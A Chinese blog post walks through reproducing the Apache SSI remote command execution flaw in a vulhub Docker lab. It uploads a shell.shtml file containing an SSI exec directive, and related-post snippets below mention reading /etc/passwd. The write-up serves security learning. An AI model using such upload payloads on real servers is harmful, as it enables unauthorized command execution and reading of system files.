漏洞复现-Apache SSI 远程命令执行漏洞

已于 2023-03-29 09:46:34 修改
阅读量259 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: apache ubuntu docker Powered by 金山文档
于 2023-02-20 10:42:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53856000/article/details/129119679
版权

漏洞原理:Apache服务器在上传文件时,很多时候不允许上传php文件,如果Apache服务器开启了SSI与CGI支持,可以上传一个shtml文件,并利用<!--#exec cmd="id"> -->语法执行任意命令。

进入环境目录:cd vulhub-master/httpd/ssi-rce/

启动环境:docker-compose build docker-compose up -d

访问地址:复现漏洞的IP地址:8080/upload.php

没有.shtml文件的可以自己写入一个shell.shtml文件,内容写入:

<!--#exec cmd="id"> -->

上传.shtml文件:

访问查看:

复现成功!小伙伴们自行尝试吧~😊

全_世界
关注
专栏目录
apache SSI远程命令执行漏洞
afei001
01-15 238
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 Vulnhub搭建漏洞环境 4.2 apache SSI远程命令执行漏洞利用 5.漏洞修复 1.漏洞概述 SSI(Server Side Includes),即服务端包含。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 通过SSI注入漏洞执行系统命令,并返回对应的结果...
Apache SSI 远程命令执行漏洞复现
qq_51331767的博客
02-20 209
访问http://139.9.66.23:8080/upload.php,可以看到一个上传页面。的基于服务器的网页制作技术。文件的默认扩展名是.stm、.shtm和.shtml。如果目标服务器开启了SSI和CGI支持,我们就可以上传shtml的文件,利用。访问一下我们上传的文件,看到如下图的代码,即说明存在远程命令执行漏洞。运行一个支持SSI和CGI的apache服务器。上传一个php的文件,提示上传的文件类型不支持。创建一个shell.shtml文件,内容如下。上传shell.shtml文件,上传成功。
07 - vulhub - Apache SSI 远程命令执行漏洞,带你碾压面试官
m0_67621628的博客
03-22 674
<!--#echo var="cat /etc/passwd" --> []( )漏洞复现 []( )环境准备 靶机环境 139.196.87.102 (vulhub) 攻击机环境 192.168.8.131 (虚拟机 Ubuntu 20、Java1.8、Burp) 启动 Apache SSI 远程命令执行漏洞 环境 1.进入 vulhub 的 ssi-rce 路径 cd /usr/local/tools/vulhub/httpd/ssi-rce 2.编译并启动环境 docker-c
07 - vulhub - Apache SSI 远程命令执行漏洞
最新发布
2401_86637333的博客
09-03 960
漏洞名称:Apache SSI 远程命令执行漏洞文末 “修复建议” 有 SSI 配置解读SSI简介:漏洞复现之前,要知道SSI是什么,那么SSI是什么呢?SSI----即server-side includesSSI功能:SSI提供了一种对现有HTML文档增加动态内容的方法,不需要编写复杂的JSP/PHP/ASP等程序或者调用CGI程序。
Apache SSI 远程命令执行漏洞
weixin_53150482的博客
07-24 315
Apache SSI 远程命令执行漏洞
[Apache SSI远程命令执行漏洞]
m0_71635484的博客
02-20 374
Apache SSI远程命令执行漏洞
复现Apache SSI 远程命令执行漏洞
qq_62673514的博客
02-19 176
复现Apache SSI 远程命令执行漏洞
漏洞复现Apache SSI 远程命令执行漏洞
qq_53409748的博客
02-19 160
SSI 注入全称Server-Side Includes Injection,即服务端包含注入。目标服务器开启了ssi功能,那么shtml文件将可以执行任意命令。在SSI中,默认扩展名是 .stm、.shtm 和 .shtml。如果上传文件程序限制了php文件的上传,且没有限制shtml文件上传,我们可以上传一个shtml文件,并利用语法执行任意命令
利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞
JiangBuLiu的博客
06-28 1352
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#...
Apache SSI远程命令执行漏洞
weixin_74020633的博客
05-03 1133
Apache SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。从技术层面来讲,SSI是一种在静态的shtml文件中根据需求插入内容;SSI其实是一套为web服务器提供的命令,指令的基本格式为:<!--指令名称="指令内容"-->指令名称指令作用#include将文本文件的内容直接插入到文档页面中#echo将环境变量插入到页面中。
CVE-2017-15715漏洞SSI-RCE漏洞
07-27
SSI-RCE漏洞是一种服务器端包含(SSI漏洞,可能导致远程命令执行SSI是一种服务器端处理动态内容的技术,它允许将外部文件包含到网页中。如果服务器未正确配置和过滤用户提供的输入,攻击者可以通过注入恶意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值